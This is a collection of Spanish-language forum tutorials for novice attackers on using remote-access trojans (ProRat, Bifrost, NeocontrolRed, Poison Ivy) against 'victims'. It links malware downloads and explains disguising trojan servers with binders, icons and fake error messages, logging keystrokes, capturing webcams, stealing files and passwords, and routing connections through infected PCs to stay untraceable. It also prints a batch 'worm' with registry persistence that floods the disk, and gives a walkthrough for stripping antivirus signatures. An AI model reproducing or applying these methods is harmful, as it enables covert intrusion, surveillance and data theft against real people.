Tutorial NeocontrolRed 4.1.0.4

Auí os dejo un tutorial del NeocontrolRed 4.1.0.4 creado por mí, la descarga de este magnífico troyano la podréis encontrar aqui:

http://ns2.elhacker.net/DECRIPT/TROYANOS/NEOCONTROLRED/NeocontrolRed_4.1.0.4.rar


EDITOR DEL SERVER (EDITOR.EXE)

EL CLIENTE DEL TROYANO, LO QUE TU ABRES PARA CONTROLAR: (CLIENT.EXE)

ALE, QUE OS CUNDA NENES, CUALQUIER DUDA, AQUI

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

MANUAL DEL PRORAT V1.9

Hola a todos, bueno, esto que sigue a continuación, es un pequeño manual que he escrito para newbies que se estén iniciando en esto de los troyanos, y que hayan optado por empezar con el ProRat. Concretamente este manual lo he basado en la versión 1.9, pero se puede aplicar a otras versiones, ya que no varía demasiado (al menos con la 1.8 ).

Antes que nada debéis descargaros el troyano, para los que no lo tenéis podéis bajarlo de AQUÍ, (la contraseña para descomprimirlo es "pro"). Recordad que antes de descargarlo debéis desactivar el antivirus, ya que si no lo hacéis, os lo detectará y lo eliminará.

Bien, una vez descargado, para mayor facilidad de uso, os podéis descargar una traducción en español del ProRat AQUÍ, está traducción la aportó mrcuco hace unos días. Una vez descargada, sólamente deberéis copiarla dentro de la carpeta language del ProRat, que se genera nada más descomprimirlo.

Bueno, parece que ya lo tenemos todo, así que vamos a empezar a trabajar con el troyano. Lo primero que debemos hacer es abrir el ProRat y seleccionar la traducción en español que acabamos de poner, así:

Una vez que hayamos hecho esto, ya tenemos el troyano en nuestro idioma. Ahora vamos a proceder a crear el server. Para ello pulsaremos donde pone crear (create, si lo tenemos en inglés):



Entonces se nos abrirán cuatro opciones: Cree El Servidor De ProRat (343 kbayt)
Cree El Servidor De descarga (2 kbayt)
Cree La Lista De la Víctima del CGI
Help

Debemos hacer click sobre Cree El Servidor De ProRat (343 kbayt), (Create ProRat Server, si lo tenemos en inglés). Entonces se nos abrirá una ventana como esta:



Esta ventana es para configurar el server, es decir, para darle las opciones al server que se adapten más a nuestras "necesidades". En ella hay diversas opciones, vamos a centrarnos en cada una paso a paso. La primera que nos encontramos es Notificaciones, (notifications si lo tenemos en inglés). Ya viene abierta por defecto así que no hace falta pulsar sobre ella.
Voy a explicar que significa cada opción:

1. Avisos via Proconnective (red y router): Esta opción es para la conexión inversa, es decir, consiste en que el ordenador de la víctima se conecta a un ip que configuras cuando creas el server, este tipo de conexión se usa para infectar ordenadores que se encuentran dentro de una lan o detrás de un router, se recomienda su uso cuando tienes ip fija ya que el pc infectado se conectará siempre con la ip con la cual configurastes el server, pero también puede utilizarse cuando posees una ip dinámica, te serviría para realizar una sola entrada ya que cuando cambie tu ip el ordenador infectado tratará de conectar a una que ya no es la tuya. Para evitar esto, puedes crearte una cuenta de no-ip, y así tu ip se renovará constantemente. AQUÍ tenéis un manual para utilizar el no-ip. Para activar este tipo de notificación simplemente tienes que activar el cuadro de abajo y donde dice Dirección ip (DNS), escribes tu ip, tu cuenta de no-ip, o la ip a la que quieras que se conecte.

2. Notificar por Mail: Esta opción no es compatible con la conexión inversa, así que no podéis tener las dos activadas. Consiste en que donde pone E-MAIL escribas tu dirección de correo,y cuando tu "víctima" abra el server, automáticamente te será enviada su ip a ese correo que has escrito antes. Esta opción no es muy fiable ya que no funciona siempre, pero aún así es bueno probarla, ya que a veces funciona de maravilla.

3. ICQ página notificación: El ICQ es un sistema para comunicarte en tiempo real parecido al Msn Messenger o el Amsn (en linux), este tipo de notificación nos envia un mensaje instantáneo cuando el ordenador infectado se conecte a la red. Si dispones de ICQ, es una opción my útil, os la recomiendo. Sólamente debéis escribir vuestro número de ICQ. Tampoco es compatible con la conexión inversa.

4. CGI notificación: Se basa en enviar la ip de la "víctima" a una dirección de una pagina web modificada por un script que acepta cgi, no es muy buena opción, ya que muchas webs bloquean este tipo de información. y para variar tampoco es compatible con la conexión inversa. Para usarla, escribe en CGI URL la dirección de la web a al que quieras que se envíe la ip.

Ya están todas explicadas, que cada uno active o desactive las que el parezcan convenientes. De todas maneras, yo personalmente siempre las desactivo todas y obtengo la ip por otros métodos. ¿Cuales?, pues el más usado es el comando ''netstat'', que consiste en mandarle por el msn cualquier archivo a la persona que quieres su ip, y mientras se está tranfiriendo vas al MS-DOS, (inicio>todos los programas>accesorios>símbolo del sistema, en windows XP), y teclear netstat -an, entonces nos aparecerán una serie de direcciones ip, entre las cuales esta la de nuestra víctima, para no confundirnos, y para que nos sea más fácil encontrarla entre todas, intentad cerrar todas las ventanas y programas, que tengáis abiertos, y así solo os saldrán una pocas ip. La de nuestra vícima debe poner al lado ESTABLISHED, ya que en ese momento estamos conectados con su ordenador gracias a la transferencia.

Ya hemos acabado con las notificaciones, así que vamos a la segunda opción: AJUSTES GENERALES. Hacéis click sobre esta opción y os saldrá una ventana como esta:



Puerto server: Este es el puerto por el que nos conectaremos al ordenador de la víctima, viene puesto el 5110 por defecto, lo mejor es dejarlo como está, pero si queréis poner alguno en especial, pues podéis hacerlo. Aunque repito que lo mejor es dejar el 5110.

Contraseña server: Esta es la contraseña con la que accederemos al ordenador de la víctima cuando queramos conectarnos. Viene puesto por defecto ''pro'', conviene cambiarla y poner otra, ya que hay gente que escanea puertos, que tengan puestas las contraseñas por defecto, y entonces se pueden conectar a tu víctima con tu server, cuando has sido tú el que te lo has currado. Y además si tu sólo querías experimentar un poco sin causar daño, a lo mejor el otro le formatea el ordenador o le hace cualquier otra cosa de mal gusto.

Nombre de la víctima: Esto es una tontería, para darle un nombre a la víctima a la que nos vamos a conectar, si te vas a conectar a muchas personas, es útil, porque le pones a cada una un nombre y así las diferencias, pero vamos, esto no sirve para mucho.

Luego siguen un gran número de opciones, que no me voy a parar a explicar ya que me extendería mucho. Sólo deciros que la mayoría vienen seleccionadas por defecto, y lo mejor es que las activéis todas, excepto la que pone "No enviar notificaciones LAN de (192.168.*.*) o (10.*.*.*)". También es interesante destacar que en la opción ''Dar un mensaje de error falso'', le demos al lado a Confi.Mesagge y escribamos un mensaje más bien convincente, ya que ese sera el mensaje de error que el saldrá a la víctima cuando abra el server.


Una vez hecho esto, pasamos a la siguiente opcion: JUNTAR CON UN ARCHIVO, nos saldrá una ventana como esta:



Bueno, de esta opción no hay mucho que explicar, yo creo que lo dice el nombre. Consiste en juntar el server con algún archivo para que esté un poco más camuflado, ya sea con una foto, un mp3 etc... Si optáis por usar esta opción, la activáis, le dáis a selecionar archivo y ponéis la ruta del archivo con el que queréis juntar el server. Esta opción es como si usaras un binder pero que viene incluído en el troyano.


Pasamos a la siguiente opción: EXTENSIONES SERVER, nos aparecerá una ventana como esta:

Esta opción sirve para darle la extensión a nuestro server que nosotros queramos. Generalemente se le suele poner *.exe, que es la que viene seleccionada por defecto, así que recomiendo dejarla. A parte de esto según pongáis una opción u otra, algunas no tienen soporte para iconos, lo cual es una desventaja, ya que estará menos camuflado.


Por último está la opción: SERVER ICONO, le damos y nos aparece esta ventana:

De esta opción no hay mucho que decir, se trata de seleccionar el icono que tendrá vuestro server, simplemente le damos encima y ya lo tenemos seleccionado. Si por alguna casualidad remota no nos gusta ninguno, y tenéis alguno que os parezca más apropiado, hacéis click en Elija nuevo icono, y ponéis la ruta de vuestro icono, que automáticamente se añadirá a la lista de iconos para que lo podáis usar siempre que queráis.

Bueno, llegado a este punto ya el server esta configurado, así que solo nos queda hacer click en Crear server, que se encuentra en la esquina inferior derecha de la pantalla. Cuando se haya creado nos saldrá un mensaje que dice: "Se a creado el servidor con sus ajustes en el directorio actual". Entonces ya tenemos el server, que como dice el mensaje, se encuentra, en el directorio donde está el ProRat. Ahora sólo nos queda enviárselo a la víctima. Aquí es donde surge la gran polémica, de que si se lo detectará el antivirus, si lo juntas a otro archivo etc... A continuación voy a dar unos consejos para camuflarlo y que la víctima no lo detecte:

1. Lo principal es cambiarle el nombre, ya que "server" queda un poco raro no? , si queréis podéis engañar a la víctima diciéndole que es una foto vuestra, y le ponéis de nombre yo03, por ejemplo.

2. Los servers se pueden hacer indetectables, modificando su estructura con un editor hexadecimal, como por ejemplo el Hex Workshop, hay un manual detallado de como hacerlo
AQUÍ. Yo nunca lo he probado, pero hay gente que dice que si lo haces indetectable, te sale un mensaje diciendo algo así como que si lo quieres indetectable que contactes con ellos y lo compres, pero no se...

3. El server se puede juntar con otro archivo, para disimular, el ProRat trae esa opción, pero es recomendable hacerlo manualmente. Esto se puede hacer con unos programas llamados Binders (o Joiners), que te permiten juntar el *.exe con un *.txt, *.avi o cualquier otro. Esto es una buena opción, ya que si por ejemplo juntáis el server con una imagen, cuando vuestra víctima la abra, simplemente verá la imagen, pero se estará infectando a sí misma sin saberlo, lo malo es que la mayoría de binders son detectados. Os dejo para descargaros algunos de los más famosos:

Calimocho

Deception

Juntador

MultiBinder

Yab

Suponiendo que ya hayáis infectado a la víctima, voy a enseñaros cómo conectaros a ella y una vez conectados las múltiples cosas que podéis hacer:


Conectarnos a la víctima: Ahora que ya hemos infectado a nuestra víctima, vamos a conectarnos a ella. Supongamos que su ip es: 83.32.151.59, pues para conectarnos a esta ip, simplemente tenemos que abrir el ProRat y en la pantalla principal, donde pone Ip: escribimos 83.32.151.59, luego en port, ponemos 5110 (que debe de estar puesto por defecto), y por último le damos a conectar. Así:

Seguidamente nos pedirá la contraseña que le hemos puesto anteriormente al server, la escribimos, le damos a aceptar y ya estamos conectados a nuestra víctima.

Opciones una vez conectados: A continuación voy a describiros las funciones del ProRat más importantes que podéis hacer una vez conectados a vuestra víctima, ya que explicarlas absolutamente todas sería muy extenso, aparte de que la mayoría de ellas se descubre la función que hacen con un poco de sentido común:

Info del PC: Con esta opción puedes ver las 25 últimas webs visitadas en el ordenador de tu víctima, obtener información sobre su sistema, y las direcciones de correo registradas en ese ordenador.

Chat: Escribes tu nick, el nick de tu víctima, el modelo de chat que prefieras, pulsas en abrir chat, e inmediatamente en el ordenador de tu víctima aparece una ventana que le ocupa toda la pantalla, en la que podéis mantener los dos una conversación, y de la que la víctima no puede salir hasta que tu pulses en cerrar chat. Es buena para acojonar.

Lammear PC: Aquí se encuentran las funciones preferidas por los lammers, son para fastidiar un poco a la víctima. Desde esta opción puedes abrir/cerrar la disquetera, enloquecer el ratón, ocultar el botón de incio, la barra de tareas etc...

IE Explorer: Esta opción sirve para obtener la versión del sistema operativo de la víctima, su página inicial, cambiar su página de inicio, abrirle una url, prohibirle la entrada a webs etc...

Panel de control: El nombre lo sugiere, esta opción te permite entrar en su panel de control y agregar o quitar programas, cambiarle las conexiones de red, desconfigurar el modem etc...

Cierra el PC: Desde aquí puedes apagar, reiniciar o terminar la sesión del ordenador de la víctima.

Hacer daños: Esta opción es para formatear el ordenador de la víctima, no la recomiendo, ya que debes tener una ética, divertirte, pero sin pasarte.

Descargas remotas: En esta opción puedes empezar a descargar en el ordenador de la víctima aplicaciones, o archivos.

Cargar archivos: Desde esta opción puedes descargarte cualquier archivo, programa, carpeta o directorio que tenga tu víctima en su ordenador, también puedes subirle a su ordenador los archivos que quieras y elimnarle o renombrarle directorios.

Keylogger: Es como cualquier otro keylogger, pulsas en lea el registro, y al momento recibes todas las teclas pulsadas por tu víctima en su ordenador, luego puedes guardar los resultados obtenidos en logs.

Funciones: En esta opción pulsas sobre el programa que quieras de la lista, e inmediatamente se iniciará en el ordenador de la víctima.

Para probar las opciones, y ver que trascendencia tendrían en el ordenador de vuestra víctima, podemos probar con nosotros mismos ejecutando el server que hemos creado en nuestro ordenador, y conectándonos con el ProRat poniendo la ip: 127.0.0.1


Desinfectación: Una vez que hayamos terminado, podemos eliminar el server para no dejar rastro, para ellos pulsáis en uno de los iconos de arriba, que si ponéis el cursor encima pone Eliminar el server Local, así:

Entonces nos aparecerá una pantalla con varias opciones, debemos hacer clic en Eliminar ProRat Server, y ya está eliminado el server del ordenador de la víctima, o del nuestro si es que estábamos haciendo una prueba con nosotros mismos, la otra opción, eliminar descargas del server, es para eliminar todo lo que nos hemos descargado del ordenador de la víctima.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Manual de como usar un troyano ocultando la ip mediante redirecci. de puertos

La idea es la siguiente;
tenemos pc°s infectas con el bifrost o cualquier troyano
si la persona le da netstat -an saltara nuestra ip
ahora si tenemos una pc infectada y la usamos como proxy saltara la ip esta
y no la nuestra
si lo hcemos varias veces 2 o 3 seremos inrastreables!!
OK empecemos
necesitamos el ccproxy
lo instalamos en nuestra pc
lo abrimos y vamos a Options
destildamos todas las opciones
y tildamos la opcion de auto startup, auto hide, port map, nt service
ok, ahora vamos al lado de port map E
bueno aqui pondremos en dest Host el no-ip q quierais de la pc proxy
en dest port ponemos el puerto q nuestra maquina va a escuchar 3284
en local port ponemos el puerto q configuraron del troyano x ejem del bifros 2000
port type TCP
le damos add
y damos OK
y damos a advanced
destildamos todo lo q haya tildado en todas las solapas
y vamos a Miscellaneous
ahi tildamos Hide All
damos aceptar
damos ok
y listo
ahora subimos el ccproxy.exe las *.dll y el .ini a la pc q queramos como proxy
lo ejecutamos remotamente y listo!!!

echo por Bourne. 06/08/2005
agradezco a Charleston;
por haberme ayudado con la idea de usar el ccproxy tambien se puede usar el sub7.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Manual, Tutorial configurar Troyano bifrost, ingenieria inversa.

el bifrost no tiene mucha complicacion, pero siempre hay gente que no lo sabe manejar, para ello hago este manual.

bajate el bifrost de aqui http://www.trojanfrance.com/index.php?dir=Trojans/Bifrost/&file=Bifrost%20v1.102.rar


Necesitas tener un host de no-ip, si no lo tienes puedes aprender a hacerlo aqui:
http://web.el-juacker.com/2008/12/manual-no-ip-facil-tutorial.html

despues te llegara una ventana asi (esta ventana debera aparecer siempre q la victima se conecte)

con el nombre de tu victima

con bifrost podras tener a todas tus victimas a la vez conectadas y podras manejarlas todas juntas (algo q en pocos troyanos se puede hacer).

en el bifrost veras muchas columnas:
Assigned Name: nombre que le has puesto a la victima
IP: La ip de la victima
Computer/User Name: Nombre del pc /sesion de la victima
Version: version del troyano
C: la X indica si el usuario tiene web cam
ping: es el ping de la victima, es lo q tarda en responder su pc, si el numero es muy elevado es que la victima se a caido y se desconectara.

al darle doble clic sobre el nombre de la victima aparecerera una ventana asi:
system info: te da la informacion del pc (version de windows, nombre...)
Unistall,update,reconnect,close server,restar server: son opciones del server como desistalar...
process list: lista de procesos, desde hay le puedes matar el msn y muxas cosas q no te interesa q tng abiertas.
windows list: es la lista de ventanas q tiene abierta en el escritorio.
password list: lista de contraseñas de IE

sobre el nombre de la victima, si pulsamos el boton derecho, veremos un menu asi:
File Manager: es su disco duro, puedes copiar, borrar, subir archivos...
System Manager: es lo mismo q dar doble click sobre el nombre, ya esta explicado arriva
Screen Capture: es para hacer capturas de pantalla, si marcas las casillas keyboard y mouse podras escribirle y clickearle en su pantalla, la barra de abajo a la izquierda regula la calidad de la captura.
Cam Capture: es para hacer capturas de web cam, la barra de abajo a la izquierda regula la calidad de la imagen.
Remote Shell: es la consola de msdos, le das a "Start" y comienza, solo debes poner los comandos que desees (muy usada para apagarle el pc poniendo shutdown -s -t 00).
key logger: al darle a keylogger veras una ventana como esta

Offline Key Logger: sirve para ver lo q a escrito tu victima desde q la infectastes con el troyano, debe estar la pestaña de "Enable offline Key Logger", al darle a "retrieve keys" t bajara todo lo q a escrito, al darle a "clear log" lo borrara.
Online Key Logger: es para ver lo q esta escribiendo la victima en ese mismo instante, activas la casilla de "Enable Online Key Logger" y empiezan a parecer las teclas q marca.


Find Pasword: busca las claves del IE.
Change Name: es para cambiar el nombre de la victima (Assigned Name).
CopY IP: Sirve para copiar la ip de la victima en el portapapeles.

IMPORTANTE:
si tienes un router no te funcionara y deberas abrir el puerto 2000, como cada router es diferente, os recomiendo q llameis a vuestro proveedor de internet y q el os lo explique.

espero q os resulte util.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Manual NO-IP [facil, tutorial]

veo q hay gente q no se aclara con lo de no-ip, asiq pongo el manual exo x un amigo y posteado ya en el foro de www.neocontrolred.tk

Hola, ayer me puse ADSL de 2mb con ya.com y no tenía ip estatica como antes, así que llegó la hora de informarme sobre lo del servicio no-ip para la conexión inversa.
Es muy facil y me funciona:
Paso 1: Entra en www.no-ip.com y pulsa sobre FREE NO-IP. Una vez hecho esto le das al botón de abajo Sign up now!
Cuando te registres y valides tu cuenta, pulsando sobre el link que mandaran a tu cuenta de correo, logueate en la página poniendo tu email y password.
Paso 2: Pulsa sobre el botón ADD en el panel de la izquierda.
En hostname pon lo que quieras, por ejemplo: vivachepper y elige algunos de los host's que ponen ahi, por ejemplo no-ip.org da igual cuál sea. En Host Tipe deja DNS (A) y deberá aparecer tu IP en IPadresses. El resto dejalo como está y dale a create host.
En un minuto o menos debería estar.
Paso 3: Ahora vete a downloads y descarga el DUCK para windows
(o pulsa aquí: http://www.download.com/3000-2165-10055182.html?legacy=cnet )
Instala este programa, que tendras que tener abierto siempre que uses un troyano con conexion inversa. Al abrirlo te pedirá tu email y password (el mismo que tienes en no-ip.com). Una vez te loggees en el programa deberá aparecerte algo como:
mirabo.no-ip.org . Cliquea sobre la carita feliz hasta que se ponga asi: XD y entonces estarás conectado.
Paso 3: Ahora creamos un server con un troyano con conexión inversa, ej: el bifrost. En donde antes teníais que poner vuestra ip, osea en DNS, pondreis el nombre del host (en este caso mirabo.no-ip.org) y ya está.
Ahora cuando le envies el server a alguien conectará con no-ip y no-ip conectará contigo tengas la ip que tengas
Las ventajas que le veo:
1º Podran usar la conexión inversa los que tengan IP dinamica sin miedo a que les cambie la IP.
2º Puedes conectarte desde casa de un amigo (solo tienes que conectarte con el DUCK y las notificaciones llegarán a la ip de tu amigo) o puedes conectarte a las víctimas de algun amigo si te conectas en el DUCK con su email y pass.

Os recuerdo que esto funciona tanto en modems como en routers, siempre y cuando los que tengan router abran puerto que use ese troyano (el del bifrost es el 2000, y el del ProRat el 5110)
Pues nada, un saludo, y espero que os funcione a todos.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Video, manual: Crear un gusano en batch

Video de como crear un virus gusano en batch desde 0. Ideal para novatos en el tema.

Codigo:
_____________________________________________
@echo off
copy %0%windir%\system32\worm.bat
REG ADD HKLM\software\microsoft\windows\currentversion\run /v hack
/d %windir%\system32\worm.bat
:worm
cd\
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd\
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm
_____________________________________________

si ejecutas el archivo worm.bat se crearan archivos infinitos en nuestro pc.
nuestro worm se autocopiara en el directorio
c:\windows\system32\worm.bat
cada ves que se incie el pc y la segunda linea es para agregar una entrada al registro lo kual iniciara el virus kada ves ke se inicie sesion

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Video: Dejando indetectable el poison ivy al nod32 con signaturezero

Este post tiene creditos de troyanosyvirus.com.ar

Introduccion:
En este video se ve como dejo un server puro del troyano poison ivy 2.3.2 indetectable al antivirus nod32 actualizado al dia.
El metodo que uso es uno de los mas faciles y rapidos, lo que realizo es buscar y encontrar la firma detectada por el antivirus con el signaturezero, reemplazando con ceros por partes el codigo hasta ayarla, una vez ayada la firma detectada exactamente, simplemente la reemplazo con ceros y el server queda indetectable al antivirus y totalmente funcional. Este metodo no requiere de edicion hexadecimal, cambios de flujo ni nada de eso, simplemente lo que se hace es borrar la firma, por lo tanto no funcionara con todos los troyanos ni con la mayoria de los encriptadores, porque romperian el archivo, si lo quieren terminar con cualquier encriptador o troyano pueden continuar leyendo el manual de Octalh (desde pag9).
Yo lo demostre con el poison ivy porque el tamaño de su server es muy pequeño y es rapido para encontrar las firmas, y utilize el nod32 porque es el antivirus que utilizo, pero un amigo lo probo con el KAV y funciona perfectamente (tienen que desactivar la inyeccion en la creacion del server para que no lo detecte la defensa proactiva de mierda)

Video:

Pasos que realize:
-Primero y principal exclui del nod32 la carpeta con la que voy a trabajar por el simple hecho de evitar que salte el cartelito diciendo que se encontro un virus cada vez que ejecuto el signaturezero, el poison ivy, los server, y demas.
-Descargue el poison ivy 2.3.2 y el signaturezero y los puse en la carpeta donde trabajare, anteriormente excluida con el nod32.
-Lo siguiente que realize fue crear el server del poison ivy 2.3.2 y lo coloque en la misma carpeta con el nombre SERVER.exe.
-Lo escanie con el nod32 y obiamente lo detectaba como troyano.
-Ejecute el siganturezero y abri el server que cree con el poison ivy (SERVER.exe)
-Rellene con ceros la parte de la derecha del server y guarde el archivo resultante con nombre "1" sin extencion.
-Abri el notepad para anotar los datos, en este caso anote 3498 que es hasta donde rellenare de ceros (no es nesesario, pero sirve para agilizar)
-Escanie el archivo "1" que guarde, con el nod32 y me aparecia que el archivo estaba infectado, lo que quiere decir que la firma que buscamos se encuentra del lado izquierdo, ya que no se relleno de ceros ese lado.
-Abri de vuelta el signaturezero, abri el server y rellene de ceros la parte izquierda del server desde 512 hasta 3498 y guarde el archivo como "2"
-Escanie el archivo "2" con el nod y me decia que el archivo estaba desinfectado, quiere decir que la firma se encuentra entre 512 y 3498.
-Despues avanze un poco hacia la izquierda, pase de 3498 a 2505, lleno de ceros guarde como "3" y analise el server: limpio, por lo tanto la firma se encuentra entre 512 y 2505.
-Seguidamente avanze hacia la derecha de 512 a 1287 lleno de ceros, guardo, analizo: server limpio, la firma se encuentra entre 1287 y 2505
-Avanzo hacia izquierda de 2505 a 2029, lleno, guardo, analizo, server limpio, la firma se encuentra entre 1287 y 2029
-Y haci sigo hasta que llego a llenar de ceros entre 1679 y 1777, guardo, analizo y me da que esta infectado, por lo tanto la firma no esta entre 1679 y 1777, por logica tiene que estar entre 1777 y 2029 y sigo el procedimiento.
-De esta manera sigo avanzando de izquierda a derecha e inversamente hasta llegar ayar la firma.
-Una vez allada la firma exacta (en mi caso esta entre 1971 y 1973), la relleno de ceros y guardo el archivo resultante con extencion .exe.

-Eso es todo ya tengo mi server del poison ivy indetectable al nod32 y pueden ver que funciona perfectamente.

Video:
Dejando indetectable el poison ivy al nod32 con signaturezero (online en flash)
Dejando indetectable el poison ivy al nod32 con signaturezero (descarga en wmv)

Descargas:
SignatureZero
Poison Ivy 2.3.2

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!